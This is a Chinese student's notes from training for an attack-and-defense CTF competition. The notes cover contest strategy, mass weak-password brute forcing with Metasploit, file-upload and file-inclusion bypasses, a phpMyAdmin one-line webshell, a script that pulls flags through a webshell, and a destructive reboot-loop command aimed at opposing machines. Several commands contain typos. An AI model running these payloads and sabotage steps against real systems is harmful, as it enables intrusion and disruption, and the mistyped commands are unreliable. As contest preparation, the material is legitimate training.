神码选拔赛培训总结

Contents

1. 第二阶段
1. 1.1. 提交模式如下：
2. 1.2. 学习备赛
2. 第三阶段
3. 重点总结
4. 相关材料：

去选拔赛的主办院校，经过了一下午和一上午的培训，时间很短但是对于国赛三阶段来说已经足够了，之前在基础的漏洞方面，owasptop10原理已经了解的比较透彻了，主要欠缺的就是一些思路，而这次培训正好给提供了这些思路，让我对三阶段有了一个不一样的认识(难度不大，出题老套，对熟练度的考试要求更高)，总的来说受益匪浅。

第二阶段

第二阶段分两种提交方式,截图提交和系统提交,截图提交为常规提交模式，web这块一定要注意程序逻辑的正确性

提交模式如下：

针对提交模式特性：

可重复提交
只有正确时才会提示
间隔10S

策略和注意点：

对于不确切的答案，可以采用多次重复提交的方式，用burpsuite intruder进行爆破，也可以用python写爆破脚本
再提交时一定要注意大小写的问题，提交模式下必须100%正确才能拿分

ps:搜索php.ini （当未在默认目录）

学习备赛

当国赛真题出来之后，按知识点搜索学习，针对性点对点的学习，提升深度

例如17国赛的python相关

在学习时熟悉python idle使用 help等命令，锻炼面对未知模块的快速适应能力
,可以用用kali中的Ipython快速补全，也可以构造自动补全的python shell

python shell

>>> import rlcompleter  
>>> import readline  
>>> readline.parse_and_bind("tab: complete")

在本地安装时会出现

error: this module is not meant to work on Windows

不支持windows ，也就是不能在沙盒环境中使用(沙盒中类似的python补全代码应该时windows)
可以在kali python shell命令行中输入以上命令然后,就可以自动补全

>>> import base64
>>> base64.
base64.EMPTYSTRING                  base64._translation
base64.MAXBINSIZE                   base64._urlsafe_decode_translation
base64.MAXLINESIZE                  base64._urlsafe_encode_translation
base64.__all__                      base64._x
base64.__class__(                   base64.b16decode(
base64.__delattr__(                 base64.b16encode(
base64.__dict__                     base64.b32decode(
base64.__doc__                      base64.b32encode(
base64.__file__                     base64.b64decode(
base64.__format__(                  base64.b64encode(
base64.__getattribute__(            base64.binascii
base64.__hash__(                    base64.decode(
base64.__init__(                    base64.decodestring(
base64.__name__                     base64.encode(
base64.__new__(                     base64.encodestring(
base64.__package__                  base64.k
base64.__reduce__(                  base64.re
base64.__reduce_ex__(               base64.standard_b64decode(
base64.__repr__(                    base64.standard_b64encode(
base64.__setattr__(                 base64.string
base64.__sizeof__(                  base64.struct
base64.__str__(                     base64.test(
base64.__subclasshook__(            base64.test1(
base64._b32alphabet                 base64.urlsafe_b64decode(
base64._b32rev                      base64.urlsafe_b64encode(
base64._b32tab                      base64.v
base64._translate(

推荐使用ipython

第三阶段

比赛流程推荐(分工去做)

1.查看本地用户，并尝试登陆ssh弱口令用户和mysql弱口令用户(ssh默认弱口令123456 mysql从web文件查看,登陆成功后记录以备后期批量扫描)
2.改密码 ssh root用户和非root用户、mysql用户密码查看历史操作命令history(可能发现工程师布置环境使用的命令)
3.备份源代码审计寻找可利用漏洞并删除web源代码
4.扫描nmap 服务器，查看靶机系统开放端口(包括常用端口+漏洞端口+后门端口)
5.系统漏洞用软连接修补漏洞或者杀掉新开进程(可以编写shell脚本自动化杀进程)
6.编写脚本批量(web 漏洞)和flag批量提交脚本

涉及技术和命令

密码修改(一次只能修改一个用户)

echo "213456" | passwd --stdin root

查看拥有bash权限用户

cat /etc/passwd | grep 'bash'

crt 登陆弱口令用户
登陆mysql弱口令用户

mysql -u用户名 -p

查找webshell后门

grep -r "eval($_POST"
grep -r "arrey_map"

web目录保存位置

/var/html/www
home/www/html

服务器端口扫描

nmap 快速扫描

ssh弱口令批量攻击

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1-255.1
rhosts => 192.168.1-255.1
msf auxiliary(scanner/ssh/ssh_login) > set username root
username => root
msf auxiliary(scanner/ssh/ssh_login) > set password 123456
password => 123456
msf auxiliary(scanner/ssh/ssh_login) > run

mysql弱口令批量攻击

msf > use auxiliary/scanner/mysql/mysql_login

系统后门
nc、telnet 等

杀端口

kaii -9 pid

软连接

一个服务可以分身多个端口，用于替换存在漏洞的服务
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=10001

缓冲区溢出漏洞利用

常见漏洞列表收集

删除flag

chattrr -i 删除flag  剔除idd权限
flag明文文件都是存在靶机内通过程序随机加密

培训学习

上传漏洞

各种简单绕过

1.本地js验证

删除调用部分

2.大小写绕过

找上传到的路径，burpsuite，或者查看源代码
strtolower防御

3.双重后缀名绕过(apache解析漏洞结合)

shell.php.x
burp 后缀名加空格

4.过滤绕过

pphphp

5.特殊后缀名(特殊的php版本的问题)

类似于htaccess
php3 4 5 6可以执行

6.文件流判断类型

验证Content-type

7.文件重写漏洞

上传覆盖掉htaccess

8.IIS6.0解析漏洞绕过

9.%00截断上传

php5.34以下存在漏洞
相关文章：https://blog.csdn.net/p656456564545/article/details/17883305

文件包含

ps:快速代码审计遍历高危函数
遍历 include 函数

1.include $_ GET() .”.php”绕过思路（%00截断）空

环境要求：

php<=5.3.4
magic_quotes_gpc(魔术引号) 为OFF

2.远程文件包含

allow_url_fopen On
allow_url_include On
用？ 或者%00截断

3.php伪协议 base64读取

php://filter/read=convert.base64-encode/resource=index.php

命令执行

1.system get
直接执行构造
2.ping system

常用cmd命令符号 & | && ||

3.dcn 页面漏洞 XSS

4.通过eval 与 system结合代码执行导致命令执行

<?php

$fun=$_GET('fun');
$far=$_GET('far');
fun(far);
?>

传值fun=system
far=”dir”

5.拼接过安全狗
利用4中的原理进行花式拼接

escapeshellcmd() 过滤防护

phpmyadmin

导出一句话木马

select'<?php @eval($_POST[-77]);?>'INTO OUTFILE '/var/www/html/shell.php'

17国赛三阶段文件解析

17国赛文件上传中的，上传到目录没有权限，可用于共享文件
webshell 命令执行
filesharing 上传文件
download file 下载文件
Displayctrl 类似于ping 命令执行

比赛环境方面

靶机大都使用较老版本linux服务器，不会使用centOS7
攻击机大概率会是老版本BT5

重点总结

1.攻击可以使用破坏性手段(不会溯源,自启动文件写reboot)

echo "reboot" > /etc/rc.local
reboot

2.使用软连接分身替换web端口和其他漏洞服务端口
3.快速攻击框架

#!/usr/bin/env python3
#-*-coding:utf-8-*-
#version:3.6.4
__author__ = '杜文涛'

import requests
import re

try:
    for i in range(0,1):
        url = "http://127.0."+str(i)+".1:8080/html/WebShell.php?cmd=cat+*flag*"


        response = requests.get(url)
        response.encoding='utf-8'
        html = response.text

        content = re.findall(r"<input.*?name=\"(.*?)\"/>",html,re.S|re.M)[0]
        print(content)
except:
    pass

4.kali 有可能访问不到别人的靶机网关一定要对桥接 (nat能够访问就可以)

5.删除flag生成文件

#/usr/bin/python
import os
os.system("chattrr -i flag*")
while(1):
    os.system("rm -f flag*")

6.国赛有一次警告机会，要大胆尝试